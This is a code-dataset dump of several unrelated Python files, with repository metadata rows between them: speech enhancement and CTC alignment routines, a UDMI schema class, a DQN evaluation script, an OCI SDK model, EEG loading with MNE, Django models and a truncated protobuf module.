# Assuming mask, feats : [Batch, Time, Channel. Freq]
# enhanced : [Batch, Time, Freq]
enh = enhanced[idx][: ilens[idx]]
mas = mask[idx][: ilens[idx]]
feat = feats[idx]
# Plot spectrogram
if args.image_dir is not None and num_images < args.num_images:
import matplotlib.pyplot as plt
num_images += 1
ref_ch = 0
plt.figure(figsize=(20, 10))
plt.subplot(4, 1, 1)
plt.title("Mask [ref={}ch]".format(ref_ch))
plot_spectrogram(
plt,
mas[:, ref_ch].T,
fs=args.fs,
mode="linear",
frame_shift=frame_shift,
bottom=False,
labelbottom=False,
)
plt.subplot(4, 1, 2)
plt.title("Noisy speech [ref={}ch]".format(ref_ch))
plot_spectrogram(
plt,
feat[:, ref_ch].T,
fs=args.fs,
mode="db",
frame_shift=frame_shift,
bottom=False,
labelbottom=False,
)
plt.subplot(4, 1, 3)
plt.title("Masked speech [ref={}ch]".format(ref_ch))
plot_spectrogram(
plt,
(feat[:, ref_ch] * mas[:, ref_ch]).T,
frame_shift=frame_shift,
fs=args.fs,
mode="db",
bottom=False,
labelbottom=False,
)
plt.subplot(4, 1, 4)
plt.title("Enhanced speech")
plot_spectrogram(
plt, enh.T, fs=args.fs, mode="db", frame_shift=frame_shift
)
plt.savefig(os.path.join(args.image_dir, name + ".png"))
plt.clf()
# Write enhanced wave files
if enh_writer is not None:
if istft is not None:
enh = istft(enh)
else:
enh = enh
if args.keep_length:
if len(org_feats[idx]) < len(enh):
# Truncate the frames added by stft padding
enh = enh[: len(org_feats[idx])]
                    elif len(org_feats[idx]) > len(enh):
padwidth = [(0, (len(org_feats[idx]) - len(enh)))] + [
(0, 0)
] * (enh.ndim - 1)
enh = np.pad(enh, padwidth, mode="constant")
if args.enh_filetype in ("sound", "sound.hdf5"):
enh_writer[name] = (args.fs, enh)
else:
# Hint: To dump stft_signal, mask or etc,
# enh_filetype='hdf5' might be convenient.
enh_writer[name] = enh
if num_images >= args.num_images and enh_writer is None:
logging.info("Breaking the process.")
break
def ctc_align(args):
def add_alignment_to_json(js, alignment, char_list):
        # build a fresh entry that holds only the CTC alignment tokens
new_js = dict()
new_js["ctc_alignment"] = []
alignment_tokens = []
for idx, a in enumerate(alignment):
alignment_tokens.append(char_list[a])
alignment_tokens = " ".join(alignment_tokens)
new_js["ctc_alignment"] = alignment_tokens
return new_js
set_deterministic_pytorch(args)
model, train_args = load_trained_model(args.model)
assert isinstance(model, ASRInterface)
model.eval()
load_inputs_and_targets = LoadInputsAndTargets(
mode="asr",
load_output=True,
sort_in_input_length=False,
preprocess_conf=train_args.preprocess_conf
if args.preprocess_conf is None
else args.preprocess_conf,
preprocess_args={"train": False},
)
if args.ngpu > 1:
raise NotImplementedError("only single GPU decoding is supported")
if args.ngpu == 1:
device = "cuda"
else:
device = "cpu"
dtype = getattr(torch, args.dtype)
logging.info(f"Decoding device={device}, dtype={dtype}")
model.to(device=device, dtype=dtype).eval()
# read json data
with open(args.align_json, "rb") as f:
js = json.load(f)["utts"]
new_js = {}
if args.batchsize == 0:
with torch.no_grad():
for idx, name in enumerate(js.keys(), 1):
logging.info("(%d/%d) aligning " + name, idx, len(js.keys()))
batch = [(name, js[name])]
feat, label = load_inputs_and_targets(batch)
feat = feat[0]
label = label[0]
enc = model.encode(torch.as_tensor(feat).to(device)).unsqueeze(0)
alignment = model.ctc.forced_align(enc, label)
new_js[name] = add_alignment_to_json(
js[name], alignment, train_args.char_list
)
else:
raise NotImplementedError("Align_batch is not implemented.")
with open(args.result_label, "wb") as f:
f.write(
json.dumps(
{"utts": new_js}, indent=4, ensure_ascii=False, sort_keys=True
).encode("utf_8")
)
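# A minimal standalone sketch of the grouper() batching used by the batch
# decoding branch and by enhance() above: chunk an iterable into fixed-size
# groups, pad the last group with None, then drop the padding. Only the
# standard library is assumed; the utterance ids are illustrative.
from itertools import zip_longest

def grouper(n, iterable, fillvalue=None):
    # Same helper as above: n iterators over the same underlying iterator
    # advance in lock-step, producing tuples of length n.
    kargs = [iter(iterable)] * n
    return zip_longest(*kargs, fillvalue=fillvalue)

keys = ["utt1", "utt2", "utt3", "utt4", "utt5"]  # placeholder utterance ids
for names in grouper(2, keys, None):
    names = [name for name in names if name]  # drop the padding, as the decoding loop does
    print(names)  # ['utt1', 'utt2'], then ['utt3', 'utt4'], then ['utt5']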
| true
| true
|
1c3eb4f292655133a8344fddffc7c4dc2b1eda07
| 1,773
|
py
|
Python
|
gencode/python/udmi/schema/model_pointset_point.py
|
johnrandolph/udmi
|
5e9de32fc71de8d006cda2eba4d3372eaf24c7c0
|
[
"Apache-2.0"
] | 1
|
2022-02-24T22:57:37.000Z
|
2022-02-24T22:57:37.000Z
|
gencode/python/udmi/schema/model_pointset_point.py
|
johnrandolph/udmi
|
5e9de32fc71de8d006cda2eba4d3372eaf24c7c0
|
[
"Apache-2.0"
] | 5
|
2022-02-24T21:32:24.000Z
|
2022-03-23T15:52:25.000Z
|
gencode/python/udmi/schema/model_pointset_point.py
|
johnrandolph/udmi
|
5e9de32fc71de8d006cda2eba4d3372eaf24c7c0
|
[
"Apache-2.0"
] | null | null | null |
"""Generated class for model_pointset_point.json"""
class PointPointsetModel:
"""Generated schema class"""
def __init__(self):
self.units = None
self.writable = None
self.baseline_value = None
self.baseline_tolerance = None
self.baseline_state = None
self.cov_increment = None
self.ref = None
@staticmethod
def from_dict(source):
if not source:
return None
result = PointPointsetModel()
result.units = source.get('units')
result.writable = source.get('writable')
result.baseline_value = source.get('baseline_value')
result.baseline_tolerance = source.get('baseline_tolerance')
result.baseline_state = source.get('baseline_state')
result.cov_increment = source.get('cov_increment')
result.ref = source.get('ref')
return result
@staticmethod
def map_from(source):
if not source:
return None
result = {}
for key in source:
result[key] = PointPointsetModel.from_dict(source[key])
return result
@staticmethod
def expand_dict(input):
result = {}
for property in input:
result[property] = input[property].to_dict() if input[property] else {}
return result
def to_dict(self):
result = {}
if self.units:
result['units'] = self.units # 5
if self.writable:
result['writable'] = self.writable # 5
if self.baseline_value:
result['baseline_value'] = self.baseline_value # 5
if self.baseline_tolerance:
result['baseline_tolerance'] = self.baseline_tolerance # 5
if self.baseline_state:
result['baseline_state'] = self.baseline_state # 5
if self.cov_increment:
result['cov_increment'] = self.cov_increment # 5
if self.ref:
result['ref'] = self.ref # 5
return result
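# A minimal round-trip sketch using the generated class above; the point
# attributes are illustrative values, not a real UDMI payload.
source = {"units": "degrees-celsius", "writable": True, "cov_increment": 0.5}

point = PointPointsetModel.from_dict(source)
print(point.units)       # degrees-celsius
print(point.to_dict())   # {'units': 'degrees-celsius', 'writable': True, 'cov_increment': 0.5}

# map_from/expand_dict handle a dict of named points in one call.
points = PointPointsetModel.map_from({"temp_sensor_1": source})
print(PointPointsetModel.expand_dict(points)["temp_sensor_1"]["units"])  # degrees-celsius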
| 28.142857
| 77
| 0.673999
|
class PointPointsetModel:
def __init__(self):
self.units = None
self.writable = None
self.baseline_value = None
self.baseline_tolerance = None
self.baseline_state = None
self.cov_increment = None
self.ref = None
@staticmethod
def from_dict(source):
if not source:
return None
result = PointPointsetModel()
result.units = source.get('units')
result.writable = source.get('writable')
result.baseline_value = source.get('baseline_value')
result.baseline_tolerance = source.get('baseline_tolerance')
result.baseline_state = source.get('baseline_state')
result.cov_increment = source.get('cov_increment')
result.ref = source.get('ref')
return result
@staticmethod
def map_from(source):
if not source:
return None
result = {}
for key in source:
result[key] = PointPointsetModel.from_dict(source[key])
return result
@staticmethod
def expand_dict(input):
result = {}
for property in input:
result[property] = input[property].to_dict() if input[property] else {}
return result
def to_dict(self):
result = {}
if self.units:
result['units'] = self.units
if self.writable:
result['writable'] = self.writable
if self.baseline_value:
result['baseline_value'] = self.baseline_value
if self.baseline_tolerance:
result['baseline_tolerance'] = self.baseline_tolerance
if self.baseline_state:
result['baseline_state'] = self.baseline_state
if self.cov_increment:
result['cov_increment'] = self.cov_increment
if self.ref:
result['ref'] = self.ref
return result
| true
| true
|
1c3eb6073760458c9c196286f9f2a366494125d3
| 3,700
|
py
|
Python
|
test.py
|
chris0711/curl_rainbow
|
2badc1302ef55b8512e6c5a0616045a1a0fd4273
|
[
"MIT"
] | 38
|
2020-07-07T11:29:18.000Z
|
2022-03-28T13:38:04.000Z
|
test.py
|
chris0711/curl_rainbow
|
2badc1302ef55b8512e6c5a0616045a1a0fd4273
|
[
"MIT"
] | 6
|
2020-08-01T11:44:39.000Z
|
2021-06-24T00:15:23.000Z
|
test.py
|
chris0711/curl_rainbow
|
2badc1302ef55b8512e6c5a0616045a1a0fd4273
|
[
"MIT"
] | 18
|
2020-08-07T04:42:37.000Z
|
2021-12-08T22:42:14.000Z
|
# -*- coding: utf-8 -*-
# MIT License
#
# Copyright (c) 2017 Kai Arulkumaran
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
# ==============================================================================
from __future__ import division
import os
import plotly
from plotly.graph_objs import Scatter
from plotly.graph_objs.scatter import Line
import torch
from env import Env
# Test DQN
def test(args, T, dqn, val_mem, metrics, results_dir, evaluate=False):
env = Env(args)
env.eval()
metrics['steps'].append(T)
T_rewards, T_Qs = [], []
# Test performance over several episodes
done = True
for _ in range(args.evaluation_episodes):
while True:
if done:
state, reward_sum, done = env.reset(), 0, False
action = dqn.act_e_greedy(state) # Choose an action ε-greedily
state, reward, done = env.step(action) # Step
reward_sum += reward
if args.render:
env.render()
if done:
T_rewards.append(reward_sum)
break
env.close()
# Test Q-values over validation memory
for state in val_mem: # Iterate over valid states
T_Qs.append(dqn.evaluate_q(state))
avg_reward, avg_Q = sum(T_rewards) / len(T_rewards), sum(T_Qs) / len(T_Qs)
if not evaluate:
# Save model parameters if improved
if avg_reward > metrics['best_avg_reward']:
metrics['best_avg_reward'] = avg_reward
dqn.save(results_dir)
# Append to results and save metrics
metrics['rewards'].append(T_rewards)
metrics['Qs'].append(T_Qs)
torch.save(metrics, os.path.join(results_dir, 'metrics.pth'))
# Plot
_plot_line(metrics['steps'], metrics['rewards'], 'Reward', path=results_dir)
_plot_line(metrics['steps'], metrics['Qs'], 'Q', path=results_dir)
# Return average reward and Q-value
return avg_reward, avg_Q
# Plots min, max and mean + standard deviation bars of a population over time
def _plot_line(xs, ys_population, title, path=''):
max_colour, mean_colour, std_colour, transparent = 'rgb(0, 132, 180)', 'rgb(0, 172, 237)', 'rgba(29, 202, 255, 0.2)', 'rgba(0, 0, 0, 0)'
ys = torch.tensor(ys_population, dtype=torch.float32)
ys_min, ys_max, ys_mean, ys_std = ys.min(1)[0].squeeze(), ys.max(1)[0].squeeze(), ys.mean(1).squeeze(), ys.std(1).squeeze()
ys_upper, ys_lower = ys_mean + ys_std, ys_mean - ys_std
trace_max = Scatter(x=xs, y=ys_max.numpy(), line=Line(color=max_colour, dash='dash'), name='Max')
trace_upper = Scatter(x=xs, y=ys_upper.numpy(), line=Line(color=transparent), name='+1 Std. Dev.', showlegend=False)
trace_mean = Scatter(x=xs, y=ys_mean.numpy(), fill='tonexty', fillcolor=std_colour, line=Line(color=mean_colour), name='Mean')
trace_lower = Scatter(x=xs, y=ys_lower.numpy(), fill='tonexty', fillcolor=std_colour, line=Line(color=transparent), name='-1 Std. Dev.', showlegend=False)
trace_min = Scatter(x=xs, y=ys_min.numpy(), line=Line(color=max_colour, dash='dash'), name='Min')
plotly.offline.plot({
'data': [trace_upper, trace_mean, trace_lower, trace_min, trace_max],
'layout': dict(title=title, xaxis={'title': 'Step'}, yaxis={'title': title})
}, filename=os.path.join(path, title + '.html'), auto_open=False)
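# Hedged usage sketch for _plot_line(): synthetic rewards from three evaluation
# episodes recorded at four checkpoints. Assumes plotly is installed; writes
# ./Reward.html to the current directory. The numbers are made up.
steps = [1000, 2000, 3000, 4000]
rewards = [
    [1.0, 2.0, 1.5],
    [2.0, 2.5, 3.0],
    [3.5, 3.0, 4.0],
    [4.0, 4.5, 5.0],
]
_plot_line(steps, rewards, 'Reward', path='.')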
| 42.528736
| 434
| 0.687568
|
from __future__ import division
import os
import plotly
from plotly.graph_objs import Scatter
from plotly.graph_objs.scatter import Line
import torch
from env import Env
def test(args, T, dqn, val_mem, metrics, results_dir, evaluate=False):
env = Env(args)
env.eval()
metrics['steps'].append(T)
T_rewards, T_Qs = [], []
done = True
for _ in range(args.evaluation_episodes):
while True:
if done:
state, reward_sum, done = env.reset(), 0, False
action = dqn.act_e_greedy(state)
state, reward, done = env.step(action)
reward_sum += reward
if args.render:
env.render()
if done:
T_rewards.append(reward_sum)
break
env.close()
for state in val_mem:
T_Qs.append(dqn.evaluate_q(state))
avg_reward, avg_Q = sum(T_rewards) / len(T_rewards), sum(T_Qs) / len(T_Qs)
if not evaluate:
if avg_reward > metrics['best_avg_reward']:
metrics['best_avg_reward'] = avg_reward
dqn.save(results_dir)
metrics['rewards'].append(T_rewards)
metrics['Qs'].append(T_Qs)
torch.save(metrics, os.path.join(results_dir, 'metrics.pth'))
_plot_line(metrics['steps'], metrics['rewards'], 'Reward', path=results_dir)
_plot_line(metrics['steps'], metrics['Qs'], 'Q', path=results_dir)
return avg_reward, avg_Q
def _plot_line(xs, ys_population, title, path=''):
max_colour, mean_colour, std_colour, transparent = 'rgb(0, 132, 180)', 'rgb(0, 172, 237)', 'rgba(29, 202, 255, 0.2)', 'rgba(0, 0, 0, 0)'
ys = torch.tensor(ys_population, dtype=torch.float32)
ys_min, ys_max, ys_mean, ys_std = ys.min(1)[0].squeeze(), ys.max(1)[0].squeeze(), ys.mean(1).squeeze(), ys.std(1).squeeze()
ys_upper, ys_lower = ys_mean + ys_std, ys_mean - ys_std
trace_max = Scatter(x=xs, y=ys_max.numpy(), line=Line(color=max_colour, dash='dash'), name='Max')
trace_upper = Scatter(x=xs, y=ys_upper.numpy(), line=Line(color=transparent), name='+1 Std. Dev.', showlegend=False)
trace_mean = Scatter(x=xs, y=ys_mean.numpy(), fill='tonexty', fillcolor=std_colour, line=Line(color=mean_colour), name='Mean')
trace_lower = Scatter(x=xs, y=ys_lower.numpy(), fill='tonexty', fillcolor=std_colour, line=Line(color=transparent), name='-1 Std. Dev.', showlegend=False)
trace_min = Scatter(x=xs, y=ys_min.numpy(), line=Line(color=max_colour, dash='dash'), name='Min')
plotly.offline.plot({
'data': [trace_upper, trace_mean, trace_lower, trace_min, trace_max],
'layout': dict(title=title, xaxis={'title': 'Step'}, yaxis={'title': title})
}, filename=os.path.join(path, title + '.html'), auto_open=False)
| true
| true
|
1c3eb626753b3d4b15e3faae5bef575eb9c8fca1
| 1,352
|
py
|
Python
|
veles/paths.py
|
AkshayJainG/veles
|
21106f41a8e7e7e74453cd16a5059a0e6b1c315e
|
[
"Apache-2.0"
] | 1,007
|
2015-07-20T12:01:41.000Z
|
2022-03-30T23:08:35.000Z
|
veles/paths.py
|
AkshayJainG/veles
|
21106f41a8e7e7e74453cd16a5059a0e6b1c315e
|
[
"Apache-2.0"
] | 52
|
2015-07-21T10:26:24.000Z
|
2019-01-24T05:46:43.000Z
|
veles/paths.py
|
AkshayJainG/veles
|
21106f41a8e7e7e74453cd16a5059a0e6b1c315e
|
[
"Apache-2.0"
] | 235
|
2015-07-20T09:42:42.000Z
|
2021-12-06T18:12:26.000Z
|
# -*- coding: utf-8 -*-
"""
.. invisible:
_ _ _____ _ _____ _____
| | | | ___| | | ___/ ___|
| | | | |__ | | | |__ \ `--.
| | | | __|| | | __| `--. \
\ \_/ / |___| |___| |___/\__/ /
\___/\____/\_____|____/\____/
Created on Nov 5, 2014
███████████████████████████████████████████████████████████████████████████████
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
███████████████████████████████████████████████████████████████████████████████
"""
import os
__root__ = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
__home__ = os.path.join(os.environ.get("HOME", "./"), ".veles")
| 33.8
| 79
| 0.598373
|
import os
__root__ = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
__home__ = os.path.join(os.environ.get("HOME", "./"), ".veles")
| true
| true
|
1c3eb762b26ba98f8d24bccb5374ee0b4f2d6251
| 2,755
|
py
|
Python
|
src/oci/secrets/models/base64_secret_bundle_content_details.py
|
LaudateCorpus1/oci-python-sdk
|
b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
src/oci/secrets/models/base64_secret_bundle_content_details.py
|
LaudateCorpus1/oci-python-sdk
|
b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
src/oci/secrets/models/base64_secret_bundle_content_details.py
|
LaudateCorpus1/oci-python-sdk
|
b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
# coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from .secret_bundle_content_details import SecretBundleContentDetails
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class Base64SecretBundleContentDetails(SecretBundleContentDetails):
"""
The contents of the secret.
"""
def __init__(self, **kwargs):
"""
Initializes a new Base64SecretBundleContentDetails object with values from keyword arguments. The default value of the :py:attr:`~oci.secrets.models.Base64SecretBundleContentDetails.content_type` attribute
of this class is ``BASE64`` and it should not be changed.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param content_type:
The value to assign to the content_type property of this Base64SecretBundleContentDetails.
Allowed values for this property are: "BASE64"
:type content_type: str
:param content:
The value to assign to the content property of this Base64SecretBundleContentDetails.
:type content: str
"""
self.swagger_types = {
'content_type': 'str',
'content': 'str'
}
self.attribute_map = {
'content_type': 'contentType',
'content': 'content'
}
self._content_type = None
self._content = None
self._content_type = 'BASE64'
@property
def content(self):
"""
Gets the content of this Base64SecretBundleContentDetails.
The base64-encoded content of the secret.
:return: The content of this Base64SecretBundleContentDetails.
:rtype: str
"""
return self._content
@content.setter
def content(self, content):
"""
Sets the content of this Base64SecretBundleContentDetails.
The base64-encoded content of the secret.
:param content: The content of this Base64SecretBundleContentDetails.
:type: str
"""
self._content = content
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
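# Hedged sketch: populate the model above from a hypothetical service payload
# and decode the base64 secret locally. The secret value is a placeholder.
import base64

payload = {"contentType": "BASE64", "content": base64.b64encode(b"s3cr3t").decode("ascii")}

details = Base64SecretBundleContentDetails()
details.content = payload["content"]       # uses the property setter defined above
print(base64.b64decode(details.content))   # b's3cr3t'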
| 34.012346
| 245
| 0.675136
|
from .secret_bundle_content_details import SecretBundleContentDetails
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class Base64SecretBundleContentDetails(SecretBundleContentDetails):
def __init__(self, **kwargs):
self.swagger_types = {
'content_type': 'str',
'content': 'str'
}
self.attribute_map = {
'content_type': 'contentType',
'content': 'content'
}
self._content_type = None
self._content = None
self._content_type = 'BASE64'
@property
def content(self):
return self._content
@content.setter
def content(self, content):
self._content = content
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| true
| true
|
1c3eb839a1a83e35d187d725833190d3a81fc9c5
| 1,049
|
py
|
Python
|
PR_BCI_team/Team_StarLab/YJKim/shallow_cnn_with_mne/gigadata2.py
|
PatternRecognition/OpenBMI
|
d9291ddb81f4319fb3764d7192e0363939a62ee9
|
[
"MIT"
] | 217
|
2015-11-02T11:10:29.000Z
|
2022-03-22T07:01:12.000Z
|
PR_BCI_team/Team_StarLab/YJKim/shallow_cnn_with_mne/gigadata2.py
|
deep-bci-g/OpenBMI
|
75daf901b2dbe215852cbff243606dcfcd10f05c
|
[
"MIT"
] | 24
|
2015-11-02T11:10:45.000Z
|
2021-09-08T11:10:33.000Z
|
PR_BCI_team/Team_StarLab/YJKim/shallow_cnn_with_mne/gigadata2.py
|
deep-bci-g/OpenBMI
|
75daf901b2dbe215852cbff243606dcfcd10f05c
|
[
"MIT"
] | 112
|
2016-01-22T01:45:44.000Z
|
2022-03-22T07:08:19.000Z
|
import scipy.io as sio
import numpy as np
import mne
def load_gigadata(MI, variable_names, plot=False):
temp = MI[variable_names]
sfreq = 1000 # Sampling frequency
chan = temp.chan.tolist()
    # TODO: channel information still needs to be added here
info = mne.create_info(ch_names=chan, sfreq=sfreq, ch_types='eeg')
t = np.hstack((temp.t.reshape(100, 1), np.zeros((100, 1))))
y_label = temp.y_dec.reshape(100, 1)
events = np.hstack((t, y_label)).astype('int')
raw = mne.io.RawArray(temp.x.T, info)
if plot == True:
scalings = 'auto' # Could also pass a dictionary with some value == 'auto'
raw.plot(n_channels=62, scalings=scalings, title='Auto-scaled Data from arrays',
show=True, block=True)
return raw, events
def gigadata_epochs(raw,events,tmin=-1,tmax=3,plot=False):
epochs = mne.Epochs(raw, events=events, event_id=[1, 2], tmin=tmin,
tmax=tmax, baseline=None, verbose=True, preload=True)
if plot == True:
epochs.plot(scalings='auto', block=True)
return epochs
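# Hedged usage sketch for the two helpers above. The .mat path and variable
# name are placeholders; struct_as_record=False and squeeze_me=True give the
# attribute-style access (temp.chan, temp.t, temp.x, temp.y_dec) that
# load_gigadata expects.
import scipy.io as sio

MI = sio.loadmat('sess01_subj01_EEG_MI.mat', struct_as_record=False, squeeze_me=True)

raw, events = load_gigadata(MI, 'EEG_MI_train', plot=False)
epochs = gigadata_epochs(raw, events, tmin=-1, tmax=3, plot=False)
print(epochs)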
| 33.83871
| 88
| 0.64347
|
import scipy.io as sio
import numpy as np
import mne
def load_gigadata(MI, variable_names, plot=False):
temp = MI[variable_names]
sfreq = 1000
chan = temp.chan.tolist()
info = mne.create_info(ch_names=chan, sfreq=sfreq, ch_types='eeg')
t = np.hstack((temp.t.reshape(100, 1), np.zeros((100, 1))))
y_label = temp.y_dec.reshape(100, 1)
events = np.hstack((t, y_label)).astype('int')
raw = mne.io.RawArray(temp.x.T, info)
if plot == True:
scalings = 'auto'
raw.plot(n_channels=62, scalings=scalings, title='Auto-scaled Data from arrays',
show=True, block=True)
return raw, events
def gigadata_epochs(raw,events,tmin=-1,tmax=3,plot=False):
epochs = mne.Epochs(raw, events=events, event_id=[1, 2], tmin=tmin,
tmax=tmax, baseline=None, verbose=True, preload=True)
if plot == True:
epochs.plot(scalings='auto', block=True)
return epochs
| true
| true
|
1c3eb889ab3a9e447cb4b4e471bb818daaf9273e
| 1,510
|
py
|
Python
|
chatbot_tutorial/models.py
|
Jishin4477/Djangobot
|
41eda19b683224dcf2efdb80dd178aa03e7bad82
|
[
"MIT"
] | null | null | null |
chatbot_tutorial/models.py
|
Jishin4477/Djangobot
|
41eda19b683224dcf2efdb80dd178aa03e7bad82
|
[
"MIT"
] | null | null | null |
chatbot_tutorial/models.py
|
Jishin4477/Djangobot
|
41eda19b683224dcf2efdb80dd178aa03e7bad82
|
[
"MIT"
] | null | null | null |
from django.db import models
from django.contrib.auth.models import User
from chatbot_tutorial._threading_local import local
# Module-level thread-local storage; without it, set_current_user/get_current_user raise NameError.
_thread_locals = local()
def set_current_user(user):
_thread_locals.user = user
def get_current_user():
return getattr(_thread_locals, 'user', None)
class DateTimeBase(models.Model):
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
created_by = models.CharField(max_length=100, default="", editable=False)
updated_by = models.CharField(max_length=100, default="", editable=False)
class Meta:
abstract = True
def save(self, *args, **kwargs):
try:
if get_current_user():
if self.created_by == "":
self.created_by = get_current_user().username
self.updated_by = get_current_user().username
except Exception as e:
print("error")
super(DateTimeBase, self).save(*args, **kwargs)
class AllCalls(DateTimeBase):
user = models.ForeignKey(User, null=True, blank=True)
entered_val = models.CharField(max_length=50, null=True, blank=True)
message = models.CharField(max_length=200, null=True, blank=True)
def __str__(self):
return u'%s' %(self.entered_val)
class GetUser(DateTimeBase):
user = models.ForeignKey(User, null=True, blank=True, default=None)
date = models.DateTimeField(default=None, null=True, blank=True)
def __str__(self):
return u'%s' %(self.user)
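# The set_current_user/get_current_user pair above is the usual thread-local
# pattern for stamping created_by/updated_by outside the request cycle. A
# standalone sketch of the same idea using only the standard library; the
# user object is a stand-in for a real auth User.
import threading

_locals = threading.local()

def _set_user(user):
    _locals.user = user

def _get_user():
    return getattr(_locals, 'user', None)

class _StubUser:
    def __init__(self, username):
        self.username = username

_set_user(_StubUser('alice'))
print(_get_user().username)  # alice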
| 29.607843
| 77
| 0.676821
|
from django.db import models
from django.contrib.auth.models import User
from chatbot_tutorial._threading_local import local
_thread_locals = local()
def set_current_user(user):
_thread_locals.user = user
def get_current_user():
return getattr(_thread_locals, 'user', None)
class DateTimeBase(models.Model):
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
created_by = models.CharField(max_length=100, default="", editable=False)
updated_by = models.CharField(max_length=100, default="", editable=False)
class Meta:
abstract = True
def save(self, *args, **kwargs):
try:
if get_current_user():
if self.created_by == "":
self.created_by = get_current_user().username
self.updated_by = get_current_user().username
except Exception as e:
print("error")
super(DateTimeBase, self).save(*args, **kwargs)
class AllCalls(DateTimeBase):
user = models.ForeignKey(User, null=True, blank=True)
entered_val = models.CharField(max_length=50, null=True, blank=True)
message = models.CharField(max_length=200, null=True, blank=True)
def __str__(self):
return u'%s' %(self.entered_val)
class GetUser(DateTimeBase):
user = models.ForeignKey(User, null=True, blank=True, default=None)
date = models.DateTimeField(default=None, null=True, blank=True)
def __str__(self):
return u'%s' %(self.user)
| true
| true
|
1c3eb8a0eae5f3799e563e32e38c6313e70f3209
| 8,763
|
py
|
Python
|
futu/common/pb/Qot_GetRehab_pb2.py
|
liteself/py-futu-api
|
a78f5b46f56d30fb82a42951823afea4b5ed1307
|
[
"Apache-2.0"
] | 2
|
2020-03-18T09:54:03.000Z
|
2020-05-15T08:13:33.000Z
|
futu/common/pb/Qot_GetRehab_pb2.py
|
liteself/py-futu-api
|
a78f5b46f56d30fb82a42951823afea4b5ed1307
|
[
"Apache-2.0"
] | 1
|
2020-04-21T02:42:32.000Z
|
2020-04-21T02:42:32.000Z
|
futu/common/pb/Qot_GetRehab_pb2.py
|
liteself/py-futu-api
|
a78f5b46f56d30fb82a42951823afea4b5ed1307
|
[
"Apache-2.0"
] | 1
|
2021-02-17T17:46:36.000Z
|
2021-02-17T17:46:36.000Z
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: Qot_GetRehab.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
import Common_pb2 as Common__pb2
import Qot_Common_pb2 as Qot__Common__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='Qot_GetRehab.proto',
package='Qot_GetRehab',
syntax='proto2',
serialized_pb=_b('\n\x12Qot_GetRehab.proto\x12\x0cQot_GetRehab\x1a\x0c\x43ommon.proto\x1a\x10Qot_Common.proto\"1\n\x03\x43\x32S\x12*\n\x0csecurityList\x18\x01 \x03(\x0b\x32\x14.Qot_Common.Security\"]\n\rSecurityRehab\x12&\n\x08security\x18\x01 \x02(\x0b\x32\x14.Qot_Common.Security\x12$\n\trehabList\x18\x02 \x03(\x0b\x32\x11.Qot_Common.Rehab\"=\n\x03S2C\x12\x36\n\x11securityRehabList\x18\x01 \x03(\x0b\x32\x1b.Qot_GetRehab.SecurityRehab\")\n\x07Request\x12\x1e\n\x03\x63\x32s\x18\x01 \x02(\x0b\x32\x11.Qot_GetRehab.C2S\"b\n\x08Response\x12\x15\n\x07retType\x18\x01 \x02(\x05:\x04-400\x12\x0e\n\x06retMsg\x18\x02 \x01(\t\x12\x0f\n\x07\x65rrCode\x18\x03 \x01(\x05\x12\x1e\n\x03s2c\x18\x04 \x01(\x0b\x32\x11.Qot_GetRehab.S2CB\x15\n\x13\x63om.futu.openapi.pb')
,
dependencies=[Common__pb2.DESCRIPTOR,Qot__Common__pb2.DESCRIPTOR,])
_C2S = _descriptor.Descriptor(
name='C2S',
full_name='Qot_GetRehab.C2S',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='securityList', full_name='Qot_GetRehab.C2S.securityList', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
